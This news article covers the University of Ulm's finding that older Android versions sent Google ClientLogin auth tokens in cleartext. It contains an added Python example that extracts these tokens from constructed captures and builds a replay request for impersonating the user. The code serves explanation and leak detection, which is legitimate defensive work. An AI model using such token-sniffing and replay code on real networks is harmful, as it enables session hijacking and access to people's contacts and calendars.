Security experts in Germany have uncovered yet another vulnerability in the Android operating system that could enable hackers to launch so-called ‘impersonation’ attacks on almost every Android device out there.
Just when you thought Google’s Android security wounds from a string of recent malware attacks were finally starting to heal, researchers at the Institute of Media Informatics at the University of Ulm have exposed a new flaw in the fast-growing mobile platform. This time the problem lies in ClientLogin, the authentication protocol Google’s own Android apps use to talk to its services, and it could potentially give cybercriminals unfettered access to contacts, calendars and other sensitive data stored on Big G’s servers.
Essentially, once a user’s log-in credentials have been accepted, the device receives an authentication token (authToken) which the Calendar and Contacts sync clients, and other apps built on ClientLogin, then attach to every subsequent request. Those requests go out over plain HTTP, so the token is transmitted in cleartext (as in unencrypted). It stays valid for up to 14 days, leaving the door open for hackers to sniff the token and replay it to log into said services masquerading as the legitimate user, without ever learning the password.
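To make the mechanism concrete, here is an added example (not code from the University of Ulm researchers or from the article) that scans constructed packet captures for ClientLogin tokens sent in the clear and shows how little an attacker needs to reuse one. It assumes the header shape Google documented for ClientLogin clients, `Authorization: GoogleLogin auth=<token>`, and the GData feed paths the Calendar and Contacts apps used; the capture tuples, the token strings and the hostnames are constructed sample data.

```python
"""Spot Google ClientLogin authTokens leaking over plaintext HTTP in captured traffic.

Added example: the captures below are constructed, not real sniffed traffic.
"""
import re
from typing import Dict, List, NamedTuple, Optional


class Capture(NamedTuple):
    host: str      # destination host of the TCP flow
    port: int      # destination port (80 = plaintext HTTP, 443 = TLS)
    payload: bytes # first bytes of the client->server stream


# ClientLogin clients send the token in this header on every API request
# (header shape as documented for ClientLogin; the token value is opaque).
_AUTH_RE = re.compile(
    rb"^Authorization:\s*GoogleLogin\s+auth=(\S+)\s*$",
    re.IGNORECASE | re.MULTILINE,
)
_REQUEST_LINE_RE = re.compile(
    rb"^(GET|POST|PUT|DELETE)\s+(\S+)\s+HTTP/1\.[01]\r?$", re.MULTILINE
)


def extract_token(payload: bytes) -> Optional[str]:
    """Return the authToken carried by an HTTP request, or None if there is none."""
    m = _AUTH_RE.search(payload)
    return m.group(1).decode("ascii", "replace") if m else None


def find_leaked_tokens(captures: List[Capture]) -> Dict[str, List[str]]:
    """Map each token seen in cleartext to the host/path pairs it was sent to.

    Only port-80 flows are parsed: a TLS flow on 443 shows ciphertext, so any
    payload that parses as HTTP here was, by definition, readable on the wire.
    """
    leaked: Dict[str, List[str]] = {}
    for cap in captures:
        if cap.port != 80:
            continue
        token = extract_token(cap.payload)
        if token is None:
            continue
        req = _REQUEST_LINE_RE.search(cap.payload)
        path = req.group(2).decode("ascii", "replace") if req else "?"
        leaked.setdefault(token, []).append(f"{cap.host}{path}")
    return leaked


def build_replay(host: str, path: str, token: str) -> bytes:
    """Build the raw request an impersonator would send with a sniffed token.

    Nothing else is needed: no password, no device secret, just the token,
    which the service accepts until it expires (up to 14 days per the report).
    This only constructs the bytes; it does not send anything.
    """
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: GoogleLogin auth={token}\r\n"
        f"GData-Version: 2\r\n\r\n"
    ).encode("ascii")


# Constructed sample captures: two background syncs over plain HTTP (the
# vulnerable pattern), one TLS ClientHello (opaque on the wire), one unrelated
# plaintext request with no token. Token values are made up.
SAMPLE_CAPTURES = [
    Capture("www.google.com", 80,
            b"GET /calendar/feeds/default/private/full HTTP/1.1\r\n"
            b"Host: www.google.com\r\n"
            b"Authorization: GoogleLogin auth=DQAAAcalendarTOKEN_constructed\r\n"
            b"GData-Version: 2\r\n\r\n"),
    Capture("www.google.com", 80,
            b"GET /m8/feeds/contacts/default/full HTTP/1.1\r\n"
            b"Host: www.google.com\r\n"
            b"Authorization: GoogleLogin auth=DQAAAcontactsTOKEN_constructed\r\n\r\n"),
    Capture("www.google.com", 443,
            b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 32),
    Capture("example.com", 80,
            b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
]


if __name__ == "__main__":
    for token, targets in find_leaked_tokens(SAMPLE_CAPTURES).items():
        print(f"cleartext token {token[:12]}... seen on: {', '.join(targets)}")
        host, _, path = targets[0].partition("/")
        print(build_replay(host, "/" + path, token).decode())
```

On an open Wi-Fi network the "captures" are simply what any neighbour can record; the scanner needs no decryption step because the sync traffic was never encrypted. The same detection logic is a reasonable check to run against an app's own traffic before shipping: any hit on port 80 is a token leak.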
The researchers stated: “We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis.
“The short answer is: Yes, it is possible, and it is quite easy to do so.”
According to the report, the flaw affects any device running Android 2.3.3 or lower. The token can be captured whenever the device syncs over an unsecured wireless network, and because synchronisation runs automatically in the background, the user does not have to be actively logging in for it to be exposed.
As such, it is highly recommended that users upgrade to Android 2.3.4 where available as soon as possible, and also turn off automatic synchronisation in the Android settings menu when connecting with open Wi-Fi networks.
To stay on the side of caution, however, especially if Android 2.3.4 has yet to arrive to your device, you should avoid open hotspots altogether until Google releases a patch to take care of the problem.
Source: University of Ulm via The Register